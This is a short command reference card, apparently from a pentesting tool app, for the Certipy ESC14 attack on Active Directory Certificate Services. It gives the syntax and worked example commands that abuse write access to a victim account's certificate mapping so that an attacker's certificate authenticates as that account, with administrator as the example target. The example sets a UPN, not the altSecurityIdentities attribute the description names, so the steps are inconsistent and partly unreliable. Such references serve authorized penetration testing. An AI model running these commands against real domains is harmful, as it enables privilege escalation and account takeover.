Certipy ESC14 (altSecurityIdentities Mapping)

ESC14: weak explicit certificate mapping via altSecurityIdentities. With write access over a victim object, set an explicit mapping that lets a certificate you control authenticate as the victim. Combine with `account update` to write the attribute, then `auth -pfx` with your existing cert.

Tool
certipy
Category
Credential Attacks / ADCS (Certificate Abuse)
Platform
linux
Requires
password
Protocols
LDAP, KERBEROS

Open in Command Manager

Syntax

Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.

certipy account update -u '<user>@<domain>' -p '<password>' -dc-ip <dc-ip> -user '<victim>' -upn '<target>@<domain>'

Examples

certipy account update -u jdoe@corp.local -p Password123! -dc-ip 10.10.10.10 -user victim -upn administrator@corp.local
certipy auth -pfx jdoe.pfx -domain corp.local

Tags

certipy adcs esc14 altsecurityidentities explicit-mapping

References